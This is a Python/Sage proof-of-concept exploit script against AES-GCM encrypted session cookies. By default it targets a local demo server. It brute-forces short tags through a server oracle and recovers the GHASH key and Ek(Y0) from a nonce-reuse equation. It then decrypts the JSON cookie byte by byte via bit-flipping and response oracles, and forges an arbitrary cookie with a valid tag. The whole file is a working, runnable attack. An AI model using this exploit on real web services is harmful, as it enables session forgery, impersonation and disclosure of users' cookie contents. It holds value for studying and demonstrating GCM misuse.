import sys
import json
import base64
import argparse
import binascii
import requests

from sage.all import *
from urllib.parse import quote, unquote, urlparse, parse_qs

########### NONCE REUSE MATH CODE ############################
def split_data(data, block_size):
    """Cut a hex string into chunks of *block_size* bytes (two hex chars per byte).

    The final chunk is right-padded with '0' characters up to a full block,
    so every returned chunk has exactly ``2 * block_size`` characters.
    An empty string yields an empty list.
    """
    chunk_len = 2 * block_size
    chunks = []
    for start in range(0, len(data), chunk_len):
        chunks.append(data[start:start + chunk_len].ljust(chunk_len, '0'))
    return chunks

def build_blocks(aad, ct, block_size=16):
    """Return the GHASH input blocks for hex-encoded *aad* and *ct*.

    Both inputs are still hex strings here. They are split into zero-padded
    blocks (AAD blocks first, then ciphertext blocks). A final lengths block
    is appended, made of the AAD bit length followed by the ciphertext bit
    length. Each length is written as *block_size* hex digits (64 bits for
    the default 16-byte block).
    """
    blocks = split_data(aad, block_size)
    blocks.extend(split_data(ct, block_size))

    # Lengths are counted in bits of the decoded data, not hex characters.
    aad_bit_len = 8 * len(binascii.unhexlify(aad))
    ct_bit_len = 8 * len(binascii.unhexlify(ct))

    length_block = '{:0{w}x}{:0{w}x}'.format(aad_bit_len, ct_bit_len, w=block_size)
    blocks.append(length_block)
    return blocks

def gen_monom(block, x, block_size=16):
    """Turn a hex block into the field element sum(x**j) over its set bits.

    The block is expanded to ``block_size * 8`` bits. Bit j is counted from
    the most significant end, so the leading bit of the block becomes x**0.
    This matches the bit order GCM uses for field elements.
    Returns 0 for an all-zero block.
    """
    bits = bin(int(block, 16))[2:].zfill(block_size * 8)
    return sum((x ** power for power, bit in enumerate(bits) if bit == '1'), 0)

def gen_polynomial(blocks, H, x, block_size=16):
    """Build the GHASH sum of block_i * H**(n - i) over *blocks*.

    With n blocks, the first block (i = 0) is multiplied by H**n and the last
    one (normally the lengths block) by H**1. *H* may be a concrete field
    element or a polynomial-ring variable; each block is mapped to a field
    element with gen_monom.
    """
    count = len(blocks)
    terms = (
        gen_monom(block, x, block_size) * H ** (count - idx)
        for idx, block in enumerate(blocks)
    )
    return sum(terms, 0)

def hex_encode_polynomial(root, bin_key_size=128):
    """Encode a GF(2)-coefficient polynomial / field element as a hex string.

    This is the inverse of gen_monom. The term x^j sets bit j counted from
    the most significant bit, so '1' (x^0) is the leading bit. The element is
    parsed from its string form, e.g. 'x^127 + x^7 + x + 1'.

    Args:
        root: Anything whose ``str()`` is a sum of the monomials '1', 'x' and
            'x^k' joined by ' + ', or '0' for the zero element.
        bin_key_size: Number of bits in the output (default 128).

    Returns:
        The value as ``bin_key_size // 4`` lowercase hex digits.

    Raises:
        ValueError: if a term is not one of the recognised monomial forms.
        IndexError: if an exponent does not fit in *bin_key_size* bits.
    """
    key_bits = ['0'] * bin_key_size
    for monom in str(root).split(' + '):
        monom = monom.strip()
        if monom == '0':
            # The zero element has no set bits. The old fallthrough wrongly
            # encoded it as the element 1.
            continue
        if monom == '1':
            key_bits[0] = '1'
        elif monom == 'x':
            key_bits[1] = '1'
        elif monom.startswith('x^'):
            key_bits[int(monom[2:])] = '1'
        else:
            raise ValueError('unexpected monomial {!r} in {!r}'.format(monom, str(root)))

    return hex(int(''.join(key_bits), 2))[2:].zfill(bin_key_size // 4)

def left_pad_with_null_blocks(blocks, needed_count):
    """Return a new list of *blocks* prefixed with '0' blocks up to *needed_count* entries.

    If *blocks* already has at least *needed_count* entries, no padding is added.
    """
    missing = max(needed_count - len(blocks), 0)
    padding = ['0' for _ in range(missing)]
    return padding + blocks

def xor_blocks(blocks1, blocks2, block_size=16):
    """XOR two lists of hex blocks position by position.

    The shorter list is left-padded with '0' blocks, so the lists are aligned
    on their last block. That keeps each pair of blocks at the same power of H
    in gen_polynomial. Each result is zero-padded to ``block_size * 2`` hex digits.
    """
    longest = max(len(blocks1), len(blocks2))
    if len(blocks1) < longest:
        blocks1 = ['0'] * (longest - len(blocks1)) + blocks1
    if len(blocks2) < longest:
        blocks2 = ['0'] * (longest - len(blocks2)) + blocks2

    width = block_size * 2
    return [
        hex(int(left, 16) ^ int(right, 16))[2:].zfill(width)
        for left, right in zip(blocks1, blocks2)
    ]

def ghash(aad, ct, ghash_key):
    """Evaluate GHASH over hex-encoded *aad* and *ct* with key *ghash_key*.

    *ghash_key* is used directly as H in gen_polynomial. It is expected to be
    an element of the GF(2^128) field below, whose modulus is
    x^128 + x^7 + x^2 + x + 1. Returns the resulting field element.
    Callers typically pass it to hex_encode_polynomial.
    """
    # Sage equivalent of: F.<a> = GF(2)[]; K.<x> = GF(2^128, modulus=...)
    base_ring = GF(2)['a']
    (a,) = base_ring._first_ngens(1)

    gcm_field = GF(2 ** 128, modulus=a ** 128 + a ** 7 + a ** 2 + a + 1, names=('x',))
    (x,) = gcm_field._first_ngens(1)

    return gen_polynomial(build_blocks(aad, ct), ghash_key, x)

def resolve_ghash_key(aad_tag_ct_1, aad_tag_ct_2):
    """Return candidate GHASH keys for two messages encrypted under the same nonce.

    Each argument is 'hex(aad):hex(tag):hex(ciphertext)'. XOR-ing the two
    messages' GHASH polynomials (blocks aligned on the right) and adding
    tag1 XOR tag2 gives a polynomial in H whose roots include the GHASH key.
    Both tags share the same Ek(Y0) mask, which cancels out in the XOR.
    Returns Sage's ``roots()`` output: a list of (root, multiplicity) pairs.
    """
    # Sage equivalent of: F.<a> = GF(2)[]; K.<x> = GF(2^128, ...); R.<H> = K[]
    ring_a = GF(2)['a']
    (a,) = ring_a._first_ngens(1)

    gcm_field = GF(2 ** 128, modulus=a ** 128 + a ** 7 + a ** 2 + a + 1, names=('x',))
    (x,) = gcm_field._first_ngens(1)

    ring_h = PolynomialRing(gcm_field, names=('H',))
    (H,) = ring_h._first_ngens(1)

    aad1, tag1, ct1 = aad_tag_ct_1.split(':')
    aad2, tag2, ct2 = aad_tag_ct_2.split(':')

    diff_blocks = xor_blocks(build_blocks(aad1, ct1), build_blocks(aad2, ct2))
    diff_poly = gen_polynomial(diff_blocks, H, x)

    tag_diff_hex = hex(int(tag1, 16) ^ int(tag2, 16))[2:].zfill(32)

    # In characteristic 2, "poly == tag_diff" is the same as "poly + tag_diff == 0".
    equation = diff_poly + gen_monom(tag_diff_hex, x)
    return equation.roots()

def resolve_nonce_reuse(aad_tag_ct_1, aad_tag_ct_2):
    """Recover candidate (GHASH key, Ek(Y0)) pairs from two same-nonce messages.

    Each argument is 'hex(aad):hex(tag):hex(ciphertext)'. For every candidate
    key H returned by resolve_ghash_key, the mask is recovered as
    Ek(Y0) = GHASH_H(aad1, ct1) XOR tag1.

    Returns:
        A list of (ghash_key_hex, ek_y0_hex) tuples, one per root. Both are
        32-digit hex strings.
    """
    aad1, tag1, ct1 = aad_tag_ct_1.split(':')
    i_tag1 = int(tag1, 16)

    ghash_key_eky0_pairs = []
    for potential_ghash_key, _multiplicity in resolve_ghash_key(aad_tag_ct_1, aad_tag_ct_2):
        ghash_value = int(hex_encode_polynomial(ghash(aad1, ct1, potential_ghash_key)), 16)

        # Format Ek(Y0) straight to hex. The old round-trip through a field
        # element and back was redundant and turned an all-zero mask into 80..0.
        encoded_ek_y0 = hex(ghash_value ^ i_tag1)[2:].zfill(32)
        encoded_ghash_key = hex_encode_polynomial(potential_ghash_key)
        ghash_key_eky0_pairs.append((encoded_ghash_key, encoded_ek_y0))

    return ghash_key_eky0_pairs

def compute_tag(wanted_aad_ct, ghash_key, ek_y0):
    """Forge the GCM tag for 'hex(aad):hex(ciphertext)' given the recovered secrets.

    *ghash_key* and *ek_y0* are 32-digit hex strings, as produced by
    resolve_nonce_reuse. The tag is GHASH_H(aad, ct) + Ek(Y0) in GF(2^128),
    i.e. a XOR. It is returned as a hex string from hex_encode_polynomial.
    """
    # Sage equivalent of: F.<a> = GF(2)[]; K.<x> = GF(2^128, modulus=...)
    poly_ring = GF(2)['a']
    (a,) = poly_ring._first_ngens(1)

    gcm_field = GF(2 ** 128, modulus=a ** 128 + a ** 7 + a ** 2 + a + 1, names=('x',))
    (x,) = gcm_field._first_ngens(1)

    key_element = gen_monom(ghash_key, x)
    mask_element = gen_monom(ek_y0, x)

    aad, ct = wanted_aad_ct.split(':')
    return hex_encode_polynomial(ghash(aad, ct, key_element) + mask_element)
########### END NONCE REUSE MATH CODE ########################

def xor(s1, s2):
    """XOR *s1* with *s2*, repeating *s2* cyclically if it is shorter.

    ``str`` arguments (including subclasses) are UTF-8 encoded first.
    The result has the length of *s1*.

    Raises:
        ValueError: if *s2* is empty while *s1* is not. Previously this
            surfaced as an opaque ZeroDivisionError from the modulo.
    """
    if isinstance(s1, str):
        s1 = s1.encode('utf-8')

    if isinstance(s2, str):
        s2 = s2.encode('utf-8')

    if s1 and not s2:
        raise ValueError('cannot XOR non-empty data with an empty key')

    key_len = len(s2)
    return bytes(c ^ s2[i % key_len] for i, c in enumerate(s1))

def get_occurrences_indexes(haystack, needle):
    """Return the start index of every (possibly overlapping) occurrence of *needle*.

    Works for both ``str`` and ``bytes``. An empty *needle* returns [].
    The previous implementation looped forever on it, because
    ``b''[k:].find(b'')`` never returns -1.
    """
    if not needle:
        return []

    indexes = []
    # Search in place with a start offset instead of re-slicing the haystack.
    index = haystack.find(needle)
    while index != -1:
        indexes.append(index)
        index = haystack.find(needle, index + 1)  # +1 keeps overlapping matches

    return indexes

def replace_occurrences(known_plaintext, ciphertext, to_replace, replace_by):
    """Bit-flip *ciphertext* so each occurrence of *to_replace* decrypts to *replace_by*.

    Occurrences are located in *known_plaintext*, the plaintext matching
    *ciphertext*. Because encryption is a keystream XOR, XOR-ing
    ``to_replace ^ replace_by`` into the ciphertext at that position changes
    the decrypted bytes accordingly.

    Unknown plaintext bytes may be given as null bytes in *to_replace*. At
    those positions the corresponding byte of *replace_by* is XORed in as-is.

    The delta is now applied directly. The previous version built it with
    ``bytes.replace`` over a zero-filled sequence, which flipped every
    position when *to_replace* was all null bytes. It also XORed a shorter
    mask cyclically when *replace_by* was shorter than *to_replace*.

    Args:
        known_plaintext: Plaintext searched for occurrences (bytes).
        ciphertext: Ciphertext to modify (bytes).
        to_replace: Plaintext bytes to change.
        replace_by: New plaintext bytes; must be the same length as *to_replace*.

    Returns:
        The modified ciphertext (bytes). Positions past its end are ignored.

    Raises:
        ValueError: if *to_replace* and *replace_by* differ in length. A
            bit-flip cannot change the plaintext length.
    """
    if not to_replace:
        return ciphertext
    if len(to_replace) != len(replace_by):
        raise ValueError('to_replace and replace_by must have the same length')

    delta = bytes(old ^ new for old, new in zip(to_replace, replace_by))
    flipped = bytearray(ciphertext)
    for index in get_occurrences_indexes(known_plaintext, to_replace):
        in_range = max(len(flipped) - index, 0)
        for offset, mask in enumerate(delta[:in_range]):
            flipped[index + offset] ^= mask
    return bytes(flipped)

def get_valid_tag(nonce, ciphertext, tag_len_wanted=1, h_key_eky0=None):
    """Return a tag the server should accept for *ciphertext*.

    Without recovered secrets (*h_key_eky0* is None), the tag is brute-forced
    against the server, *tag_len_wanted* bytes long. Otherwise *h_key_eky0*
    is a (ghash_key_hex, eky0_hex) pair and the full tag is computed locally
    for an empty AAD.
    """
    if h_key_eky0 is None:
        return bruteforce_tag(nonce, ciphertext, tag_len_wanted=tag_len_wanted)

    ghash_key, eky0 = h_key_eky0
    aad_ct = ':' + binascii.hexlify(ciphertext).decode()  # empty AAD
    tag_hex = compute_tag(aad_ct, ghash_key, eky0)
    return binascii.unhexlify(tag_hex)

def bruteforce_tag(nonce, ciphertext, tag_len_wanted=1):
    """Guess a tag for *ciphertext* one byte at a time using is_valid_tag.

    For each of the *tag_len_wanted* positions, all 256 values are tried for
    the next byte appended to the prefix found so far. The first one
    is_valid_tag accepts is kept. This presumably relies on the target
    checking only as many tag bytes as it receives (TODO confirm against
    the exploited server).

    Returns:
        The tag bytes found. The tag is shorter than *tag_len_wanted* if some
        position had no accepted value; a warning is printed in that case.
    """
    tag = b''
    for _ in range(tag_len_wanted):
        for tag_byte in range(256):
            tmp_tag = tag + bytes([tag_byte])
            print_progress("Bruteforcing tag: " + binascii.hexlify(tmp_tag).decode())
            if is_valid_tag(nonce, ciphertext, tmp_tag):
                tag = tmp_tag
                break
        else:
            # No value was accepted here. The prefix did not grow, so
            # continuing would re-send the same 256 requests for every
            # remaining position. Stop instead.
            break

    print() # Add a new line
    if len(tag) < tag_len_wanted:
        print('Warning: only recovered {} of {} tag bytes'.format(len(tag), tag_len_wanted))
    return tag

def get_and_extend_keystream(known, nonce, ciphertext, h_key_eky0, wanted_len):
    """Return the first *wanted_len* keystream bytes for *nonce*.

    The keystream is known plaintext XOR ciphertext. While it is too short:
    - the ciphertext is lengthened with an arbitrary b'A' byte;
    - decrypt_json recovers the plaintext that byte decrypts to under the
      same nonce;
    - XOR-ing the two reveals one more keystream byte.

    Raises:
        RuntimeError: if a round recovers no new plaintext byte. Previously
            this retried the same request pattern forever.
    """
    keystream = xor(known, ciphertext[:len(known)])
    while len(keystream) < wanted_len:
        # Making ciphertext longer and longer to make known longer and longer
        if len(known) == len(ciphertext):
            ciphertext += b'A' # Adding A's for pwning traditions

        previous_len = len(known)
        known = decrypt_json(known, nonce, ciphertext, h_key_eky0, show_keystream_progress=True)
        if len(known) <= previous_len:
            print()
            raise RuntimeError(
                'Could not recover keystream byte at offset {}'.format(previous_len)
            )
        keystream = xor(known, ciphertext[:len(known)])

    print() # Adding a new line
    return keystream[:wanted_len]

def decrypt_json(known, nonce, ciphertext, h_key_eky0, show_keystream_progress=False):
    """Recover plaintext bytes after the known prefix *known*, one byte at a time.

    For the next unknown byte, each value g in 0..255 is tried:
    - assume the plaintext is ``known + g``;
    - bit-flip the first ``len(known) + 1`` ciphertext bytes so that, if g is
      correct, they decrypt to '{' + spaces + '}';
    - obtain a tag via get_valid_tag;
    - ask is_ciphertext_valid whether the server accepts the result.
    The accepted guess extends *known*.

    Stops when *known* covers the whole ciphertext, or when no value is
    accepted for a position. Retrying that position would only repeat the
    same requests.

    Args:
        known: Known plaintext prefix (bytes, at least 1 byte).
        nonce: Nonce to send with each forged cookie.
        ciphertext: Ciphertext whose plaintext is being recovered.
        h_key_eky0: (ghash_key_hex, eky0_hex) pair, or None to brute-force tags.
        show_keystream_progress: Show the keystream in hex as progress
            instead of the decoded plaintext.

    Returns:
        The extended known plaintext (bytes).
    """
    while len(known) < len(ciphertext):
        # Target plaintext "{   ...   }" of length len(known) + 1.
        replace_by = b'{' + b' ' * (len(known) - 1) + b'}'
        # Keeping only necessary bytes to create empty object "{}"
        shortened_ciphertext = ciphertext[:len(known) + 1]

        for guess in range(256):
            to_replace = known + bytes([guess])
            mod_ciphertext = replace_occurrences(to_replace, shortened_ciphertext, to_replace, replace_by)

            if not show_keystream_progress:
                # errors='replace': known may end inside a multi-byte UTF-8
                # character, which made a strict decode() crash.
                progress = known.decode('utf-8', errors='replace') + hex(guess)[2:].zfill(2)
            else:
                progress = binascii.hexlify(xor(to_replace, ciphertext)).decode()
            print_progress(progress)

            tag = get_valid_tag(nonce, mod_ciphertext, h_key_eky0=h_key_eky0)
            if is_ciphertext_valid(nonce, mod_ciphertext, tag):
                known = to_replace
                break
        else:
            # No byte value was accepted at this position; give up here.
            break

    if not show_keystream_progress:
        print() # Adding a new line
    return known

####################### EXPLOITED-SERVER-DEPENDENT CODE ########################

def is_valid_tag(nonce, ciphertext, tag):
    """Tag oracle: send the packed cookie and report whether the tag was accepted.

    The cookie counts as accepted when the response carries no Set-Cookie
    header. This presumably means the server only re-issues a session
    cookie when the submitted one fails to authenticate (TODO confirm
    against the target).

    Uses the module-level ``sess`` (a requests.Session) and ``url``.
    """
    global sess, url

    # To debug through an intercepting proxy, pass
    # proxies={'http': 'http://127.1:8080', 'https': 'https://127.1:8080'}
    # to sess.get() below.

    sess_cookie = pack_cookie(nonce, ciphertext, tag)
    sess.cookies.set('session', None)  # in requests, setting None removes the old cookie
    sess.cookies.set('session', sess_cookie)

    r = sess.get(url)

    # requests' header mapping is case-insensitive. Test for presence directly
    # rather than comparing with a 'nope' sentinel a real header value could equal.
    return 'Set-Cookie' not in r.headers

def is_ciphertext_valid(nonce, ciphertext, tag):
    """Validity oracle: return True when the server answers the forged cookie with HTTP 200.

    Telling an invalid tag apart from an invalid ciphertext can be difficult.
    It may require timing or specific error responses. If no tag works at
    all, the ciphertext is most likely invalid.

    Uses the module-level ``sess`` and ``url``.
    """
    global sess, url

    # To debug through an intercepting proxy, pass
    # proxies={'http': 'http://127.1:8080', 'https': 'https://127.1:8080'}
    # to sess.get() below.

    cookie_value = pack_cookie(nonce, ciphertext, tag)
    jar = sess.cookies
    jar.set('session', None)
    jar.set('session', cookie_value)

    response = sess.get(url)
    return response.status_code == 200

def pack_cookie(nonce, ciphertext, tag):
    """Build the session cookie value base64(nonce || base64(ciphertext) || tag).

    Note that the ciphertext is base64-encoded twice: once on its own, then
    again together with the nonce and tag. Returns a str.
    """
    encoded_ct = base64.b64encode(ciphertext)
    raw_cookie = b''.join((nonce, encoded_ct, tag))
    return base64.b64encode(raw_cookie).decode()

####################### END EXPLOITED-SERVER-DEPENDENT CODE ####################

def print_progress(value):
    """Overwrite the current terminal line with *value*.

    The output ends with a carriage return instead of a newline, so the next
    call redraws the same line. Callers print() once when finished.
    """
    print(value, sep='', end='\r')

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description = 'PoC for decryption and forgery of AES-GCM encrypted cookie.\nUsage: sage -python this_script.py -c cookie -f wanted_forged_cookie')
    parser.add_argument('-c', '--cookie', type=str, help='Original cookie as received from the server', required=True)
    parser.add_argument('-f', '--wanted_forgery', type=str, help='The string you want the server to get after decryption', required=True)
    # The oracle endpoint used to be hard-coded; the default keeps that value.
    parser.add_argument('-u', '--url', type=str, default='http://localhost:8888/demo_server.php',
                        help='URL of the endpoint used as the oracle (default: %(default)s)')
    args = parser.parse_args()

    print(' =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=')
    print(' ===== PoC for decryption and forgery of AES-GCM encrypted cookie =====')
    print(' =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=')
    print()

    # Cookie layout: base64(nonce[12 bytes] || base64(ciphertext) || tag[16 bytes])
    cookie = base64.b64decode(unquote(args.cookie))
    nonce = cookie[:12]
    ciphertext = base64.b64decode(cookie[12:-16])
    tag = cookie[-16:]

    print('Nonce: ', binascii.hexlify(nonce))
    print('Ciphertext: ', binascii.hexlify(ciphertext))
    print('Tag: ', binascii.hexlify(tag))
    print('-' * 80)

    # `url` and `sess` must stay module-level globals: is_valid_tag and
    # is_ciphertext_valid read them via `global sess, url`.
    url = args.url
    sess = requests.Session()

    ## -------------------------------------------------------------------------
    ## 1. Create empty ciphertext and bruteforce tag
    empty_ciphertext = b''
    new_tag = bruteforce_tag(nonce, empty_ciphertext, tag_len_wanted=16)
    # Shortcut for reruns: a tag hard-coded from an earlier run (presumably
    # only valid for that run's cookie/nonce).
    #new_tag = binascii.unhexlify('1ccdefebff9dd71d12d4f0dc53700848')
    print('Found new tag:', binascii.hexlify(new_tag).decode())
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 2. Change {"... to "{}" + tag
    known = b'{"'
    to_replace = b'{"'
    replace_by = b'{}'
    shortened_ciphertext = ciphertext[:2] # Only 2 bytes are needed to have the empty object "{}"

    print('Modifying the known ciphertext start from \'{"...\' to \'{}\'')
    mod_ciphertext = replace_occurrences(known, shortened_ciphertext, to_replace, replace_by)

    print('Modified ciphertext:', binascii.hexlify(mod_ciphertext))
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 3. Compute ghash key and get potential solutions for mod_ciphertext
    empty_aad = b''

    # resolve_nonce_reuse and compute_tag expect ciphertexts in the format
    # "hex_encoded(aad):hex_encoded(tag):hex_encoded(ciphertext)"
    original_ct = empty_aad + b':' + binascii.hexlify(tag) + b':' + binascii.hexlify(ciphertext)
    empty_ct = empty_aad + b':' + binascii.hexlify(new_tag) + b':'

    print('Computing candidate GHASH key and Ek(y0) pairs...')

    ghash_key_eky0_pairs = resolve_nonce_reuse(original_ct.decode(), empty_ct.decode())
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 4. Find valid solution
    print('Calculating candidate tags and testing on the server...')

    wanted_ct = b':' + binascii.hexlify(mod_ciphertext)
    for candidate_ghash_key, candidate_eky0 in ghash_key_eky0_pairs:
        candidate_tag = compute_tag(wanted_ct.decode(), candidate_ghash_key, candidate_eky0)
        if is_valid_tag(nonce, mod_ciphertext, binascii.unhexlify(candidate_tag)):
            print('Found GHASH key and the associated Ek(y0)!')
            ghash_key = candidate_ghash_key
            eky0 = candidate_eky0 # Encrypted Y0 -> Y0 being nonce + first iteration of counter
            print('GHASH key:', ghash_key)
            print('Ek(Y0):', eky0)
            break
    else:
        # Without a confirmed pair, ghash_key/eky0 would be unbound below
        # (NameError). Stop with a clear message instead.
        sys.exit('No candidate GHASH key / Ek(Y0) pair produced a tag accepted by the server; aborting.')

    ghash_key_eky0 = (ghash_key, eky0)
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 5. Decrypt by changing {"... to "{ }" + tag (repeat)
    print('Decrypting the JSON string...')
    known = b'{"'
    plain = decrypt_json(known, nonce, ciphertext, ghash_key_eky0)
    # Shortcut for reruns against the demo server: plaintext from an earlier run.
    #plain = b'{"username":"Guest","secret":"something_to_show_decryption"}'
    print('Successfully decrypted ciphertext:', plain)
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 6. Extend keystream for length needed
    print('Extending known keystream...')
    forgery = args.wanted_forgery
    # The keystream must cover the UTF-8 *byte* length. Using the character
    # count made xor() cycle the keystream for non-ASCII forgeries.
    forgery_bytes = forgery.encode('utf-8')
    keystream = get_and_extend_keystream(plain, nonce, ciphertext, ghash_key_eky0, len(forgery_bytes))

    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 7. Bitflip wanted cookie and output
    print('Forging valid ciphertext for wanted forgery...')
    forged_ct = xor(forgery_bytes, keystream)
    formatted_ct = b':' + binascii.hexlify(forged_ct) # Formatting for compute_tag which expects "hex(aad):hex(ciphertext)"
    tag = binascii.unhexlify(compute_tag(formatted_ct.decode(), ghash_key, eky0))
    sess_cookie = pack_cookie(nonce, forged_ct, tag)
    print('Wanted forgery:', forgery)
    print('Forged cookie:', sess_cookie)

